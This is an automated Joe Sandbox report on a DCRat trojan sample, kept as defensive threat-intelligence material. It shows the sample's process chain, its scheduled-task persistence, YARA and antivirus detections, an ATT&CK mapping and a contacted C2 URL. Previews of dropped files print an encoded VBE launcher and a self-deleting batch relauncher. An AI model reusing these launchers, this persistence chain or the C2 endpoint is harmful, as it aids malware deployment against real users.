            Source: w32tm.exe, 0000000D.00000002.1852263700.0000026D2A7B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeAPI call chain: ExitProcess graph end nodegraph_0-23401
            Source: C:\winSaves\fontsavesbroker.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004F866F
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004F753D mov eax, dword ptr fs:[00000030h]0_2_004F753D
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004FB710 GetProcessHeap,0_2_004FB710
            Source: C:\winSaves\fontsavesbroker.exeProcess token adjusted: DebugJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess token adjusted: DebugJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess token adjusted: DebugJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EF063 SetUnhandledExceptionFilter,0_2_004EF063
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004EF22B
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004F866F
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004EEF05
            Source: C:\winSaves\fontsavesbroker.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe"Jump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe" Jump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EED5B cpuid 0_2_004EED5B
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_004EA63C
            Source: C:\winSaves\fontsavesbroker.exeQueries volume information: C:\winSaves\fontsavesbroker.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeQueries volume information: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe VolumeInformationJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeQueries volume information: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe VolumeInformationJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeQueries volume information: C:\winSaves\fontsavesbroker.exe VolumeInformation
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004ED5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_004ED5D4
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004DACF5 GetVersionExW,0_2_004DACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000010.00000002.1890656655.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.1891516685.000000000303E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1890656655.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1933324919.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1933324919.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1890656655.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1802058996.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1802058996.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.1891516685.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fontsavesbroker.exe PID: 2332, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe PID: 6420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe PID: 4456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontsavesbroker.exe PID: 4592, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000010.00000002.1890656655.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.1891516685.000000000303E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1890656655.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1933324919.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1933324919.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1890656655.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1802058996.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1802058996.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.1891516685.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fontsavesbroker.exe PID: 2332, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe PID: 6420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe PID: 4456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontsavesbroker.exe PID: 4592, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		21
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		11
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory121
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media1
            Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Native API            		Login HookLogin Hook11
            Process Injection            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain Credentials3
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Software Packing            		DCSync37
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1524358 Sample: j0GOUGjcJD.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Antivirus detection for dropped file 2->57 59 10 other signatures 2->59 10 j0GOUGjcJD.exe 3 6 2->10         started        13 TGdhCspOsuwHWHVRmOneCNdUUqTS.exe 3 2->13         started        16 TGdhCspOsuwHWHVRmOneCNdUUqTS.exe 2 2->16         started        process3 file4 49 C:\winSaves\fontsavesbroker.exe, PE32 10->49 dropped 51 C:\winSaves\0VySiddKAXOECI1ul.vbe, data 10->51 dropped 18 wscript.exe 1 10->18         started        71 Antivirus detection for dropped file 13->71 73 Multi AV Scanner detection for dropped file 13->73 75 Machine Learning detection for dropped file 13->75 signatures5 process6 signatures7 61 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->61 21 cmd.exe 1 18->21         started        process8 process9 23 fontsavesbroker.exe 3 10 21->23         started        27 conhost.exe 21->27         started        file10 43 C:\...\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe, PE32 23->43 dropped 45 C:\Windows\Cursors\SearchApp.exe, PE32 23->45 dropped 47 C:\Users\user\AppData\...\vxPvY9xhrB.bat, DOS 23->47 dropped 63 Antivirus detection for dropped file 23->63 65 Multi AV Scanner detection for dropped file 23->65 67 Machine Learning detection for dropped file 23->67 69 2 other signatures 23->69 29 cmd.exe 1 23->29         started        31 schtasks.exe 23->31         started        33 schtasks.exe 23->33         started        35 4 other processes 23->35 signatures11 process12 process13 37 w32tm.exe 1 29->37         started        39 conhost.exe 29->39         started        41 fontsavesbroker.exe 29->41         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            j0GOUGjcJD.exe74%ReversingLabsByteCode-MSIL.Trojan.ZmutzyLscpt
            j0GOUGjcJD.exe100%AviraVBS/Runner.VPG
            j0GOUGjcJD.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe100%AviraHEUR/AGEN.1323984
            C:\winSaves\0VySiddKAXOECI1ul.vbe100%AviraVBS/Runner.VPG
            C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat100%AviraBAT/Delbat.C
            C:\Windows\Cursors\SearchApp.exe100%AviraHEUR/AGEN.1323984
            C:\winSaves\fontsavesbroker.exe100%AviraHEUR/AGEN.1323984
            C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe100%Joe Sandbox ML
            C:\Windows\Cursors\SearchApp.exe100%Joe Sandbox ML
            C:\winSaves\fontsavesbroker.exe100%Joe Sandbox ML
            C:\Windows\Cursors\SearchApp.exe88%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
            C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe88%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
            C:\winSaves\fontsavesbroker.exe88%ReversingLabsByteCode-MSIL.Trojan.Jalapeno

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://ch67763.tw1.ru/@==gbJBzYuFDTtrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefontsavesbroker.exe, 00000004.00000002.1802058996.0000000002F04000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1524358
              Start date and time:2024-10-02 17:53:02 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 47s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:23
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:j0GOUGjcJD.exe
              renamed because original name is a hash value
              Original Sample Name:2b577aea211c0031d052f521c6d5c0ec.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@24/12@0/0
              EGA Information:
              • Successful, ratio: 20%
              HCA Information:
              • Successful, ratio: 77%
              • Number of executed functions: 374
              • Number of non-executed functions: 101
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, SearchApp.exe
              • Excluded domains from analysis (whitelisted): ch67763.tw1.ru, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target TGdhCspOsuwHWHVRmOneCNdUUqTS.exe, PID 4456 because it is empty
              • Execution Graph export aborted for target TGdhCspOsuwHWHVRmOneCNdUUqTS.exe, PID 6420 because it is empty
              • Execution Graph export aborted for target fontsavesbroker.exe, PID 2332 because it is empty
              • Execution Graph export aborted for target fontsavesbroker.exe, PID 4592 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: j0GOUGjcJD.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              16:54:06Task SchedulerRun new task: SearchApp path: "C:\Windows\Cursors\SearchApp.exe"
              16:54:06Task SchedulerRun new task: SearchAppS path: "C:\Windows\Cursors\SearchApp.exe"
              16:54:06Task SchedulerRun new task: TGdhCspOsuwHWHVRmOneCNdUUqTS path: "C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe"
              16:54:07Task SchedulerRun new task: TGdhCspOsuwHWHVRmOneCNdUUqTST path: "C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe"

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe.log

              Download File
              Process:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):1281
              Entropy (8bit):5.370111951859942
              Encrypted:false
              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
              MD5:12C61586CD59AA6F2A21DF30501F71BD
              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontsavesbroker.exe.log

              Download File
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):1740
              Entropy (8bit):5.36827240602657
              Encrypted:false
              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
              MD5:B28E0CCD25623D173B2EB29F3A99B9DD
              SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
              SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
              SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

              C:\Users\user\AppData\Local\Temp\4ty73C4Ot0

              Download File
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):25
              Entropy (8bit):4.243856189774723
              Encrypted:false
              SSDEEP:3:7Ux6RgBdc+n:q3rZn
              MD5:4E08BA54A77F093123115E61CC7FA128
              SHA1:3B7FBE82F6C75471F1BB764E8050C624E6E39122
              SHA-256:365FA36BEAD943817F54E070221646A24C51DB53D4B340185035DFC119AE617B
              SHA-512:D1890CD910827AFC853B141D1C954A7A8012D124AE9553DB30D5A9E31725773DFBF3867D393B33AB43CB942FBDBEA0C7D9A8EAC0DBA30424891E2DC8A6F4355D
              Malicious:false
              Preview:sH3Flnpa516XT6uWzuEFXxyKT

              C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat

              Download File
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:DOS batch file, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):196
              Entropy (8bit):5.052718018254349
              Encrypted:false
              SSDEEP:6:hITg3Nou11r+DEhM0sKOZG1wkn23fj1FG:OTg9YDEh7WfL1c
              MD5:D8ADD36E073FCDA4A0DEE2F64D35B5A7
              SHA1:2DB7BF2C3715A456330D86D7FA8EFA8E630A3403
              SHA-256:49006DEA649DECE06A1C2A024F30F89891FEBCC13B82228B90FFF670C9964B6A
              SHA-512:8CB94806A14E45AB5245B3C2D9EAAF6C6DE06AC29059704565E3A79A9D13254BD21BFD5400DA7A722DAAE4A7080F907DCC378A2CE5BDDCA07D3A004EC3FCDB86
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\winSaves\fontsavesbroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\vxPvY9xhrB.bat"

              C:\Windows\Cursors\38384e6a620884

              Download File
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):103
              Entropy (8bit):5.608261206542817
              Encrypted:false
              SSDEEP:3:8R1GegEnZxwAGe0JXunqiKsWMUwqpT1q:qGIZK5LJYqlsWPwqpTg
              MD5:13E3321880AE371DB8062EDDC6DF36AA
              SHA1:09FD0093B080F99E695ED9492366AE1B4B039670
              SHA-256:92D1CDC9EA7F3FF54247DC3AFA7CDB3383E0FDB126C9ADCD7981D31F4C71DEB3
              SHA-512:EC4B6B2D9CB0D288ADAF72CB6B630A789EFF9BD0609525CAF3CC0C20C6EBCBCE2D9FB07E385E2128B0FCDAAC72E140A5B9FC39B30534BA2212350A6FDABB6E10
              Malicious:false
              Preview:qP8v8PN7mmlg1oIatdTnnyVXz724KGgg7CDuuhV2Y8dDKQ1yLCCB1dc23k5BXSxfGEiykXpMIbOoUSNiGDsHEfpekL0KlUeFL86FrDO

              C:\Windows\Cursors\SearchApp.exe

              Download File
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.080640642128486
              Encrypted:false
              SSDEEP:12288:8DTblYiD2UQavcM7pokcJJgyJrQEi20MeIl2JPpTK8R+TBP:4lYiD2UQCmkcJJ1iul2LTK8R+TBP
              MD5:173D5AC0A5C8FBF0A3990DFD33A329B5
              SHA1:479DD85A5921FA5D0DE0CD164FCC626791634ADE
              SHA-256:57FB0DEF3DF546AA3FC26CA768A66BB79F120BACE0ED7474E0C65003CF96DC12
              SHA-512:558CE6EB0ACA76EF003DE2A19ECE63F4B5854BF927DECCBBF939A4ABE4F8233B155D839892837261FAC2B2A71B33BA25D456F776144C3980F076ECD9A64D7BEE
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\winSaves\0VySiddKAXOECI1ul.vbe

              Download File
              Process:C:\Users\user\Desktop\j0GOUGjcJD.exe
              File Type:data
              Category:dropped
              Size (bytes):208
              Entropy (8bit):5.795274789439553
              Encrypted:false
              SSDEEP:6:GogwqK+NkLzWbHa/JUrFnBaORbM5nCMQz55s:GoBMCzWLauhBaORbQCMQNm
              MD5:8C47B37F0C9C6A607A8C2F8A92447036
              SHA1:3E6D7C7B3C3EC75F43D021EDF32F956F69AE5BE2
              SHA-256:563E80EDF8D73BC8FEFFFAE2A15FE9B2E92CEBB70C1E4507F421D4717952396D
              SHA-512:CBEDFFC1EE2F9B0560F2C39CB5F3B58D36AF06049D73B4FB5B5759E5DBCE63DC0E285C6856DE97B1824C882B9559DFAF111F04A77E61A80C44B6DF8287E0BC4D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:#@~^twAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zAbxUl\./Ji2sm"pjkid5bS:X/n*qsfGR(lDJSPTS,0CVknhjkAAA==^#~@.

              C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe

              Download File
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.080640642128486
              Encrypted:false
              SSDEEP:12288:8DTblYiD2UQavcM7pokcJJgyJrQEi20MeIl2JPpTK8R+TBP:4lYiD2UQCmkcJJ1iul2LTK8R+TBP
              MD5:173D5AC0A5C8FBF0A3990DFD33A329B5
              SHA1:479DD85A5921FA5D0DE0CD164FCC626791634ADE
              SHA-256:57FB0DEF3DF546AA3FC26CA768A66BB79F120BACE0ED7474E0C65003CF96DC12
              SHA-512:558CE6EB0ACA76EF003DE2A19ECE63F4B5854BF927DECCBBF939A4ABE4F8233B155D839892837261FAC2B2A71B33BA25D456F776144C3980F076ECD9A64D7BEE
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat

              Download File
              Process:C:\Users\user\Desktop\j0GOUGjcJD.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):33
              Entropy (8bit):4.124256907946324
              Encrypted:false
              SSDEEP:3:I5D2EMbLwEa4i:I5M0V
              MD5:91129DA897A4DD387D2DB9F93EBB8260
              SHA1:6784E5F5F49A1435337A2D6DC01AFE5DD76DA0A8
              SHA-256:A8B4D980F24E850CC47C9E427F4C6582AF71D71C1D31206011A8489DCC4D158A
              SHA-512:09BFCDA2F68E2A2689FC7AA0CE2EC06492CF8475D4B874B59FF02DCB105C6AB714C8FFE99B4FF344BAE692A4A1018C08CEDF388B0E10D6423C5A9EB2D9CCBABF
              Malicious:false
              Preview:"C:\winSaves\fontsavesbroker.exe"

              C:\winSaves\d8d5508f805aac

              Download File
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:ASCII text, with very long lines (680), with no line terminators
              Category:dropped
              Size (bytes):680
              Entropy (8bit):5.897445668605952
